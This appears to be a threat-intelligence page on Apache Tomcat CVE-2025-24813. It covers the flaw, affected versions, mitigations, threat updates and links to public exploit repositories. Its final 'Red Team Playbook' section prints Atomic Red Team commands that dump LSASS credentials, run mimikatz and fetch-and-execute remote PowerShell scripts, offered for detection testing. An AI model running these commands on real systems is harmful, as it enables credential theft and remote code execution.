CVE-2025-24813
Overview
This vulnerability is a path equivalence flaw in Apache Tomcat's Default Servlet, specifically related to internal dot handling in file names (e.g., 'file.Name'). The root cause lies in the servlet's write-enabled configuration combined with support for partial HTTP PUT requests, allowing manipulation of file paths and content. Affected components include the Default Servlet handling file uploads and session persistence mechanisms in specific Apache Tomcat versions.
Vulnerability Description
Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: - writes enabled for the default servlet (disabled by default) - support for partial PUT (enabled by default) - a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads - attacker knowledge of the names of security sensitive files being uploaded - the security sensitive files also being uploaded via partial PUT If all of the following were true, a malicious user was able to perform remote code execution: - writes enabled for the default servlet (disabled by default) - support for partial PUT (enabled by default) - application was using Tomcat's file based session persistence with the default storage location - application included a library that may be leveraged in a deserialization attack Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.
Impact
An unauthenticated attacker can exploit this vulnerability to upload malicious files or modify existing sensitive files, enabling remote code execution and full server compromise. This requires that the Default Servlet is write-enabled and partial PUT support is active, conditions not enabled by default. Successful exploitation can lead to unauthorized access to sensitive data, execution of arbitrary commands, and potential lateral movement within the affected environment, resulting in severe business impact including data breaches and operational disruption.
Solution
Users must upgrade Apache Tomcat to versions 11.0.3, 10.1.35, or 9.0.99 as these contain fixes for the vulnerability. The Apache Software Foundation advisory (https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq) provides detailed patch instructions. Administrators should verify that the Default Servlet write capability is disabled unless explicitly required and review partial PUT support configurations as interim mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question relates to a path equivalence issue in a widely used web server framework, which can lead to severe consequences such as remote code execution and information disclosure. This flaw primarily arises from the handling of file uploads through the default servlet, particularly when write access is enabled. The internal dot notation in file names can be exploited to manipulate file paths, allowing attackers to access sensitive files or inject malicious content into uploaded files. This vulnerability is exacerbated by the default configuration settings that permit partial PUT requests, which can be leveraged to upload files in a manner that bypasses standard security checks.
Exploitation of this vulnerability can occur under specific conditions. An attacker must have knowledge of the names of sensitive files and the ability to upload files to a directory that is a sub-directory of a publicly accessible upload path. If these conditions are met, the attacker can potentially view sensitive data or inject harmful content into files. In more severe scenarios, if the application utilizes file-based session persistence and includes libraries vulnerable to deserialization attacks, an attacker could execute arbitrary code on the server. This multifaceted nature of the vulnerability makes it particularly dangerous, as it can lead to a complete compromise of the affected system.
The real-world impact of this vulnerability is significant, especially for organizations relying on the affected versions of the web server framework. Successful exploitation can lead to unauthorized access to sensitive information, including user data and application secrets, which can have dire consequences for business operations and reputation. For instance, a data breach resulting from this vulnerability could lead to regulatory penalties, loss of customer trust, and substantial financial losses. Furthermore, the potential for remote code execution means that an attacker could gain full control over the server, leading to further exploitation of the network and connected systems.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest patched versions of the affected software. Regularly updating software and applying security patches is a fundamental practice in cybersecurity hygiene. Additionally, organizations should review their configuration settings, particularly those related to file uploads and servlet permissions. Disabling write access for the default servlet, unless absolutely necessary, can significantly reduce the attack surface. Implementing strict input validation and sanitization measures for file uploads can also help prevent exploitation attempts. Monitoring server logs for unusual activity related to file uploads can aid in early detection of potential exploitation.
In conclusion, the vulnerability presents a critical risk to organizations using the affected web server framework. Its ability to facilitate remote code execution and information disclosure underscores the importance of maintaining robust security practices. By staying informed about vulnerabilities, applying timely updates, and configuring systems securely, organizations can mitigate the risks associated with this and similar vulnerabilities. The consequences of neglecting such vulnerabilities can be severe, making proactive security measures essential for safeguarding sensitive data and maintaining operational integrity.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-24813, with telemetry indicating a sharp increase in activity over recent days. This surge coincides with the public availability of multiple new proof-of-concept exploit tools on widely accessed platforms, lowering the barrier for threat actors to weaponize this critical Apache Tomcat vulnerability. While ransomware groups have not yet been conclusively linked to active campaigns exploiting this flaw, the association of Iranian IRGC data extortion operations with this vulnerability remains a concern given their historical targeting of web infrastructure. The current threat landscape reflects heightened adversary interest and expanding exploitation capabilities, elevating the urgency for defenders to monitor for signs of compromise. Consequently, the risk level for organizations running affected Apache Tomcat versions should be considered elevated, as opportunistic attackers are increasingly equipped to leverage this vulnerability for remote code execution and data exfiltration.
Update 2 — May 20, 2026
Recent telemetry from CSURFACE threat intelligence indicates a significant reduction in detection activity related to CVE-2025-24813, despite the emergence of new proof-of-concept exploits that have broadened the exploitation landscape. This divergence suggests that while fewer attacks are currently observed, adversaries are actively developing and refining tools to leverage this vulnerability more effectively. The CVSS score adjustment to a perfect 10.0 underscores the criticality of the flaw, reflecting its potential for complete system compromise via remote code execution. Although the EPSS score remains high but stable, the lack of a rapid increase in exploit attempts may indicate a temporary lull rather than diminished risk. Notably, no new ransomware group associations have been identified, and the Iranian IRGC data extortion operations continue to be the primary high-profile threat actor linked to this vulnerability. For defenders, this evolving dynamic means that vigilance must be maintained despite the apparent drop in exploit detections, as the availability of advanced exploitation tools could enable more sophisticated or widespread attacks in the near term. Consequently, the overall threat level remains elevated, with a heightened emphasis on monitoring for novel exploitation techniques and potential shifts in adversary tactics.
Update 3 — June 09, 2026
Recent developments indicate an expanded exploitation landscape for CVE-2025-24813, marked by the emergence of multiple new proof-of-concept tools targeting affected Apache Tomcat versions. CSURFACE threat intelligence notes that these tools leverage sophisticated vectors such as Java deserialization and HTTP PUT method abuse, increasing the feasibility of remote code execution attacks. Although the CVSS score was adjusted slightly downward to 9.8, this refinement reflects a more precise risk characterization rather than a reduction in severity. Our telemetry shows a stable but persistent presence of exploitation attempts, underscoring that threat actors continue to prioritize this vulnerability despite no confirmed ransomware campaigns directly linked to it. The availability of diverse exploitation methods broadens the attack surface and may facilitate more widespread or targeted intrusions, particularly against organizations relying on vulnerable Tomcat deployments. Consequently, the overall threat level remains critical, with heightened importance on monitoring for novel exploitation techniques and potential shifts in adversary behavior.
Update 4 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-24813, accompanied by the emergence of new proof-of-concept exploits that leverage Java deserialization and HTTP PUT methods to achieve remote code execution on vulnerable Apache Tomcat instances. This expansion in the exploit landscape correlates with an increased EPSS score, signaling a heightened likelihood of successful compromise. Although no direct ransomware campaigns have been linked to this vulnerability, the association with Iranian IRGC data extortion operations remains under observation, underscoring the potential for this flaw to be weaponized in targeted extortion or espionage activities. For defenders, the broadened availability of exploitation tools and the intensifying attack frequency amplify the risk to organizations running affected Tomcat versions, particularly those with default servlet configurations permitting write access. Consequently, the threat level for CVE-2025-24813 has escalated to critical with an increased urgency for vigilant monitoring and rapid response to emerging exploitation vectors.
Affected Products (50)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apache | Tomcat | All |
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
|
|
|
Apache | Tomcat | All |
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
|
|
|
Apache | Tomcat | All |
cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone1:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone10:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone11:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone12:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone13:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone14:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone15:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone16:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone17:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone18:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone19:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone2:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone20:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone3:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone4:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone5:*:*:*:*:*:*
|
|
|
Apache | Tomcat | 10.1.0 |
cpe:2.3:a:apache:tomcat:10.1.0:milestone6:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Tomcat Partial PUT Java Deserialization
exploits/multi/http/tomcat_partial_put_deserialization
|
sw0rd1ight, Calum Hutton, h4ck3r-04 | Unknown | unix, linux | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Apache Tomcat 11.0.3 - Remote Code Execution | Al Baradi Joy | webapps | multiple | - | View |
GitHub PoCs (53)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
absholi7ly/POC-CVE-2025-24813
his repository contains an automated Proof of Concept (PoC) script for exploiting **CVE-2025-24813**, a Remote Code Exec...
|
absholi7ly | 196 | 43 | 2025-03-14 | View |
|
iSee857/CVE-2025-24813-PoC
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
|
iSee857 | 98 | 28 | 2025-03-13 | View |
|
drcrypterdotru/Apache-GOExploiter
Apache (CVE-2025-24813) GOExploiter Checker & Exploiter very Fast
|
drcrypterdotru | 19 | 4 | 2025-08-31 | View |
|
mbanyamer/Apache-Tomcat---Remote-Code-Execution-via-Session-Deserialization-CVE-2025-24813-
Apache Tomcat - Remote Code Execution via Session Deserialization (CVE-2025-24813)
|
mbanyamer | 18 | 3 | 2025-05-25 | View |
|
charis3306/CVE-2025-24813
CVE-2025-24813利用工具
|
charis3306 | 16 | 0 | 2025-03-16 | View |
|
qzy0x/cve-2025-24813_poc
cve-2025-24813验证脚本
|
qzy0x | 11 | 2 | 2025-03-14 | View |
|
Franconyu/Poc_for_CVE-2025-24813
CVE-2025-24813 poc
|
Franconyu | 9 | 3 | 2025-04-10 | View |
|
x00byte/PutScanner
A tool that identifies writable web directories in Apache Tomcat via HTTP PUT method [CVE-2025-24813]
|
x00byte | 7 | 2 | 2025-07-19 | View |
|
u238/Tomcat-CVE_2025_24813
A playground to test the RCE exploit for tomcat CVE-2025-24813
|
u238 | 7 | 0 | 2025-03-24 | View |
|
msadeghkarimi/CVE-2025-24813-Exploit
Apache Tomcat Remote Code Execution (RCE) Exploit - CVE-2025-24813
|
msadeghkarimi | 6 | 1 | 2025-03-18 | View |
|
pirenga/CVE-2025-24813
Example PoC for CVE-2025-24813 (Tomcat RCE)
|
pirenga | 2 | 5 | 2025-09-16 | View |
|
Erosion2020/CVE-2025-24813-vulhub
CVE-2025-24813的vulhub环境的POC脚本
|
Erosion2020 | 5 | 0 | 2025-04-18 | View |
|
Shivshantp/CVE-2025-24813
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC
|
Shivshantp | 5 | 0 | 2025-07-28 | View |
|
Mattb709/CVE-2025-24813-Scanner
CVE-2025-24813-Scanner is a Python-based vulnerability scanner that detects Apache Tomcat servers vulnerable to CVE-2025...
|
Mattb709 | 5 | 0 | 2025-04-12 | View |
|
La3B0z/CVE-2025-24813-POC
CVE-2025-24813-POC JSP Web Shell Uploader
|
La3B0z | 2 | 2 | 2025-04-06 | View |
|
beyond-devsecops/CVE-2025-24813
Session Exploit
|
beyond-devsecops | 4 | 0 | 2025-03-24 | View |
|
AsaL1n/CVE-2025-24813
simple exp for CVE-2025-24813
|
AsaL1n | 4 | 0 | 2025-04-05 | View |
|
cchopin/CVE-Arsenal-Lab
TomcatScanner is a comprehensive security tool designed for detecting and exploiting the CVE-2025-24813 vulnerability in...
|
cchopin | 4 | 0 | 2025-04-10 | View |
|
imbas007/CVE-2025-24813-apache-tomcat
Nuclei Template CVE-2025–24813
|
imbas007 | 3 | 1 | 2025-03-17 | View |
|
Mattb709/CVE-2025-24813-PoC-Apache-Tomcat-RCE
A Python proof-of-concept exploit for CVE-2025-24813 - Unauthenticated RCE in Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.3...
|
Mattb709 | 3 | 1 | 2025-04-12 | View |
|
Alaatk/CVE-2025-24813-POC
CVE-2025-24813 Apache Tomcat RCE Proof of Concept (PoC)
|
Alaatk | 4 | 0 | 2025-03-21 | View |
|
AlperenY-cs/CVE-2025-24813
Create lab for CVE-2025-24813
|
AlperenY-cs | 3 | 0 | 2025-03-28 | View |
|
N0c1or/CVE-2025-24813_POC
CVE-2025-24813_POC
|
N0c1or | 3 | 0 | 2025-03-14 | View |
|
tonyarris/CVE-2025-24813-PoC
A PoC for CVE-2025-24813
|
tonyarris | 1 | 0 | 2025-03-22 | View |
|
GadaLuBau1337/CVE-2025-24813
|
GadaLuBau1337 | 1 | 0 | 2025-04-08 | View |
|
ftz7/PoC-CVE-2025-24813
Este script explora a vulnerabilidade CVE-2025-24813 em versões específicas do Apache Tomcat, permitindo execução remota...
|
ftz7 | 1 | 0 | 2025-08-11 | View |
|
manjula-aw/CVE-2025-24813
This repository contains a shell script based POC on Apache Tomcat CVE-2025-24813. It allow you to easily test the vuln...
|
manjula-aw | 1 | 0 | 2025-03-30 | View |
|
MuhammadWaseem29/CVE-2025-24813
Apache Tomcat is vulnerable to a Path Equivalence / Path Traversal issue due to improper handling of ../ sequences in pa...
|
MuhammadWaseem29 | 1 | 0 | 2025-04-05 | View |
|
f8l124/CVE-2025-24813-POC
A simple, easy-to-use POC for CVE-2025-42813 (Apache Tomcat versions below 9.0.99).
|
f8l124 | 1 | 0 | 2025-04-09 | View |
|
fatkz/CVE-2025-24813
|
fatkz | 1 | 0 | 2025-05-11 | View |
|
cyglegit/CVE-2025-24813
Automated scanner + exploit for CVE-2025-24813
|
cyglegit | 1 | 0 | 2025-08-06 | View |
|
seahcy/CVE-2025-24813
Instructions for rapid deployment of Tomcat v9.0.90 with java 25.0.1 2025-10-21 LTS on Windows Server 2019 Standard for ...
|
seahcy | 1 | 0 | 2025-12-23 | View |
|
EQSTLab/CVE-2025-24813
Apache Tomcat RCE
|
EQSTLab | 1 | 0 | 2026-03-26 | View |
|
n0n-zer0/Spring-Boot-Tomcat-CVE-2025-24813
POC for CVE-2025-24813 using Spring-Boot
|
n0n-zer0 | 0 | 1 | 2025-03-20 | View |
|
gregk4sec/CVE-2025-24813
Security Researcher
|
gregk4sec | 1 | 0 | 2025-03-14 | View |
|
Dhananjayasj/CVE-2025-24813-Apache-Tomcat-Partial-PUT-Deserialization-RCE-
|
Dhananjayasj | 0 | 0 | 2026-06-10 | View |
|
JTMH37/Apache-Tomcat-CVE-2025-24813-Lab
ICT279 Vulnerability Detection and Mitigation Project using CVE-2025-24813 in an Internet Banking Environment
|
JTMH37 | 0 | 0 | 2026-06-01 | View |
|
suil12/CVE-2025-24813_presentation
|
suil12 | 0 | 0 | 2026-05-19 | View |
|
Arthurabriel/POC-CVE-2025-24813
|
Arthurabriel | 0 | 0 | 2025-12-05 | View |
|
michael-david-fry/Apache-Tomcat-Vulnerability-POC-CVE-2025-24813
Apache Tomcat Vulnerability POC (CVE-2025-24813)
|
michael-david-fry | 0 | 0 | 2025-03-19 | View |
|
ps-interactive/lab-cve-2025-24813
Resources for teh Apache Tomcat CVE lab
|
ps-interactive | 0 | 0 | 2025-03-19 | View |
|
B1gN0Se/Tomcat-CVE-2025-24813
|
B1gN0Se | 0 | 0 | 2025-03-31 | View |
|
horsehacks/CVE-2025-24813-checker
Hello researchers, I have a checker for the recent vulnerability CVE-2025-24813-checker.
|
horsehacks | 0 | 0 | 2025-04-07 | View |
|
hakankarabacak/CVE-2025-24813
Proof of Concept (PoC) script for CVE-2025-24813, vulnerability in Apache Tomcat.
|
hakankarabacak | 0 | 0 | 2025-04-27 | View |
|
ThHardvester/CVE-2025-24813
Remote Code Execution (RCE) vulnerability in Apache Tomcat.
|
ThHardvester | 0 | 0 | 2025-05-10 | View |
|
x1ongsec/CVE-2025-24813
tomcat CVE-2025-24813 反序列化RCE环境
|
x1ongsec | 0 | 0 | 2025-06-21 | View |
|
sentilaso1/CVE-2025-24813-Apache-Tomcat-RCE-PoC
Proof of Concept for CVE-2025-24813, a Remote Code Execution vulnerability in Apache Tomcat. This PoC exploits unsafe de...
|
sentilaso1 | 0 | 0 | 2025-07-12 | View |
|
CEAlbez/CVE-2025-24813-PoC
This is a PoC for the CVE-2025-24813 and tested in different environments.
|
CEAlbez | 0 | 0 | 2025-09-03 | View |
|
Makavellik/POC-CVE-2025-24813-Apache-Tomcat-Remote-Code-Execution
Este repositorio contiene un exploit automatizado desarrollado con fines educativos y de investigación en ciberseguridad...
|
Makavellik | 0 | 0 | 2025-09-08 | View |
|
GongWook/CVE-2025-24813
POC
|
GongWook | 0 | 0 | 2025-07-07 | View |
|
Heimd411/CVE-2025-24813-noPoC
|
Heimd411 | 0 | 0 | 2025-04-07 | View |
|
yaleman/cve-2025-24813-poc
|
yaleman | 0 | 0 | 2025-07-03 | View |
|
gunyakit/CVE-2025-24813-PoC-exploit
Apache Tomcat Deserialization RCE
|
gunyakit | 0 | 0 | 2025-12-10 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
